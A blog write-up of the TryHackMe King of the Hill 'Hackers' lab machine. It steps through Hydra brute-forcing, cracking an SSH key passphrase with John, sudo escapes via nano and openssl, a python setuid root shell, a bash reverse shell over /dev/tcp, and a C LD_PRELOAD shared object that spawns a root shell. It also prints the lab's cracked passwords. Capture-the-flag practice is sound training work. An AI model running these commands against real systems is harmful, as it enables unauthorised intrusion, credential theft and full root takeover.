h00dy

TryHackMe KoTH Machine Hackers

TryHackMe KoTH Machine Hackers

kunal jaglan's photo
kunal jaglan
ยท

3 min read

KoTH Hackers

IP: 10.10.228.111

Open Ports Via Nmap -

nmap -sC -sV 10.10.228.1115

21
22
80
9999

Subdirectories Via Gobuster -

/news
/contact
/img
/staff
/backdoor

Login via ftp anonymously -
We'll get a note, which will give us usernames to brute-force (:

When we cat that note, we get -

Gcrawford Credentials Via Hydra -
hydra -l gcrawford -P /usr/share/wordlists/rockyou.txt 10.10.228.111 ftp

username: gcrawford
password: PAOLA

Login via ftp using these creds

We got id_rsa of gcrawford user from cd /.ssh/id_rsa

Since it's a protected private key we need to crack the passphrase for id_rsa of gcrawford using JohnTheRipper

ssh2john id_rsa > forjohn

john forjohn --wordlist=/usr/share/wordlists/rockyou.txt

We Got The Pass For Private Key

id_rsa:25192519

login via gcrawford using id_rsa

ssh -i id_rsa gcrawford@10.10.228.111
privilege escalation of gcrawford user cuz of sudo ability over nano

sudo -l

We can see nano's Gtfo-Bins

sudo nano
^R^X
reset; sh 1>&0 2>&0
Rcampbell Credentials Via Hydra -
hydra -l rcampbell -P /usr/share/wordlists/rockyou.txt 10.10.228.111 ftp


![](https://cdn.hashnode.com/res/hashnode/image/upload/v1674581280491/9ed48854-301b-42de-82d3-8c0e7215656b.png align="center")

`username: rcampbell`  
`password: molly`  

###### Login via ftp using rcampbell credentials -  

`ftp 10.10.228.111`

![](https://cdn.hashnode.com/res/hashnode/image/upload/v1674581506997/9f2d1f7a-9a1b-4e1b-8ef7-9555a44404ad.png align="center")

##### Login via ssh with rcampbell with the same password of this user for ftp and search for `capabilities`  

```plaintext
getcap -r / 2>/dev/null

Now to get root, we can do -

python3 -c 'import os;os.setuid(0);os.system("/bin/bash")'

Crack the password for backdoor

hydra -l plague -P /usr/share/wordlists/rockyou.txt 10.10.228.111 http-post-form "/api/login:username=^USER^&password=^PASS^:Incorrect" -IV

username: plague
password: twentyone

start a net-cat listener on your machine, and we can get a rev-shell using -

nc -lnvp <port> 

bash -i >& /dev/tcp/<ip>/<port> 0>&1

You can get a rev shell with user production logged in and can achieve privilage escalation using this c code -

First, let's try to check for sudo abilities of user production by running command:

sudo -l

We see openssl in sudo list, we can abuse it to get root let's check Gtfo-Bins For Openssl And How To Use It To Load Shared Libraries

Check out this blog for more on it ld_preload-privesc 

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
unsetenv("LD_PRELOAD");
setgid(0);
setuid(0);
system("/bin/sh");
}

gcc -fPIC -shared -o shell.so shell.c -nostartfiles

start a python server and transfer the shell.so to machine

python3 -m http.server 80

wget <ip>/shell.so

chmod +x shell.so

sudo openssl req -engine ./shell.so

Thank you for reading<3

tryhackmekothWrite Up
ย